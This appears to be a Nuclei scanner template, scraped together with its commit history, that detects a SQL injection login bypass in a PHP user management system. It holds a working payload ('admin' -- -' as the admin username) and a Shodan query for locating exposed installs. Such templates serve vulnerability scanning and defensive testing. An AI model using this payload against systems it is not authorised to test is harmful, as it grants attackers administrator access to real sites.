nuclei-templates/http/vulnerabilities/other/user-management-system-sqli...

id: user-management-system-sqli

info:
  name: User Management/Registration & Login v3.0 - SQL Injection
  author: f0xy
  severity: high
  description: |
    User Registration & Login and User Management System v3.0 admin panel has SQL vulnerability. Even though the person who discovered the vulnerability tested it in version 3.0, version 3.2 also contains the same vulnerability. It can be exploited by entering "admin' -- -" as the username parameter in the admin panel.
  reference:
    - https://www.exploit-db.com/exploits/51695
    - https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Registration and Login System"
  tags: sqli,auth-bypass,user-management

http:
  - raw:
      - |
        POST /admin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin%27+--+-&password=whatever&login=

      - |
        GET /admin/dashboard.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Admin Dashboard"
          - "Manage Users"
          - "Signout"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bc1d5effe5bde1f24beca0c441db912f123fe9b6c02ce9f7044820dbc894a41f0221009ebb0ae0179a9fab2d04d9e4f0b909283e868e4950fe9a3681a7e90ff6f202cc:922c64590222798bb761d5b6d8e72950
updated matcher, req & name 2024-04-15 08:17:38 +00:00			`id: user-management-system-sqli`

			`info:`
			`name: User Management/Registration & Login v3.0 - SQL Injection`
			`author: f0xy`
			`severity: high`
			`description: \|`
			`User Registration & Login and User Management System v3.0 admin panel has SQL vulnerability. Even though the person who discovered the vulnerability tested it in version 3.0, version 3.2 also contains the same vulnerability. It can be exploited by entering "admin' -- -" as the username parameter in the admin panel.`
			`reference:`
			`- https://www.exploit-db.com/exploits/51695`
			`- https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/`
			`metadata:`
			`verified: true`
			`max-request: 2`
			`shodan-query: title:"Registration and Login System"`
			`tags: sqli,auth-bypass,user-management`

			`http:`
			`- raw:`
			`- \|`
			`POST /admin HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`username=admin%27+--+-&password=whatever&login=`

			`- \|`
			`GET /admin/dashboard.php HTTP/1.1`
			`Host: {{Hostname}}`

			`host-redirects: true`
			`max-redirects: 2`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "Admin Dashboard"`
			`- "Manage Users"`
			`- "Signout"`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Apr 16 10:06:53 UTC 2024] :robot: 2024-04-16 10:06:53 +00:00			`# digest: 4b0a00483046022100bc1d5effe5bde1f24beca0c441db912f123fe9b6c02ce9f7044820dbc894a41f0221009ebb0ae0179a9fab2d04d9e4f0b909283e868e4950fe9a3681a7e90ff6f202cc:922c64590222798bb761d5b6d8e72950`